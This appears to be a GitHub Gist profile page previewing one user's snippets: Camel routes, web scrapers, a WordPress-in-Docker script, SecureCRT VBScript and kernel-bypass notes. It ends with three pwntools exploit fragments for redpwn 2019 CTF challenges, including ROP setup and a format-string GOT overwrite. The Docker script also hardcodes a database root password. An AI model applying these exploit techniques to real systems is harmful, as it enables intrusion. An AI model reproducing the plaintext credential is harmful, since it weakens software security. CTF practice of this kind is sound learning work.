Skip to content

Instantly share code, notes, and snippets.

View swt02026's full-sized avatar

LEE KUANTING swt02026

  • Sinopac Securities
View GitHub Profile
import org.apache.camel.builder.RouteBuilder
import org.apache.camel.impl.DefaultCamelContext
import org.apache.camel.main.Main
import java.text.SimpleDateFormat
import java.util.*
fun getCurrentDate():String{
val sdf = SimpleDateFormat("yyyyMMdd")
return sdf.format(Date())
}
from playwright import sync_playwright
import io
import time
with sync_playwright() as p:
rand_file = io.FileIO("accupass", 'w')
writer = io.BufferedWriter(rand_file, buffer_size=100000000)
for browser_type in [p.chromium]:
browser = browser_type.launch()
page = browser.newPage()
for i in range(180):
@swt02026
swt02026 / wordpress_in_docker.sh
Last active September 19, 2020 06:14
create wordpress in docker network
docker network create wp
docker run -itd --name db1 --network wp \
-v /docker_data/db1:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=Redhat1! \
-e TZ="Asia/Taipei" mariadb --character-set-server=utf8mb4 \
--collation-server=utf8mb4_unicode_ci
docker run -it --name wordpress -p 80:80 --network wp \
-v /docker_data/wordpress:/var/www/html \
-e WORDPRESS_DB_NAME=wp \
const puppeteer = require('puppeteer');
for (const i of Array(50).keys()){
(async () => {
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto(`https://old.accupass.com/search/r/1/0/0/0/4/${i}/00010101/99991231`, {waitUntil: 'networkidle2'});
//await page.pdf({path: 'hn.pdf', format: 'A4'});
const all_of = await page.$$eval("h3", (nodes)=>nodes.map(node=>node.innerHTML));
console.log(all_of)
# $language = "VBScript"
# $interface = "1.0"
Class FtpLoginInfo
Public userName
Public password
Public serverIp
Public Default Function Init(un, pw, ip)
userName = un
password = pw
# $language = "VBScript"
# $interface = "1.0"
Sub Main()
Set myShell = CreateObject("WScript.Shell")
myShell.Run "notepad.exe"
crt.Sleep 500
myShell.SendKeys "%F"
crt.Sleep 500
myShell.SendKeys "^O"
Kernel Bypass
作業系統層(user space觀察kernel space)
1. ebpf
2. dtrace
延伸應用
1. tcpdump
2. seccomp
網路方面
1. XDP(使用ebpf)
2. RDMA(Infiniband)
from pwn import *
r=remote('chall2.2019.redpwn.net',4002)
gets=0x080483b0
system=0x0804b010
buf=0x0804a000
import struct
from pwn import *
r=remote('chall2.2019.redpwn.net', 4004)
#r=process('/home/ubuntu/environment/bronze_ropchain')
#raw_input()
# Padding goes here
p = 'a'*(0x18 +4)
#p += struct.pack('<I', 0x080a8e86) # pop eax ; ret
from pwn import *
exit_got= 0x0804a020
r=remote('chall.2019.redpwn.net', 4003)
r.sendline(p32(exit_got)+p32(exit_got+1)+'%47c%7$hhn'+'%336c%8$hhn')
r.interactive()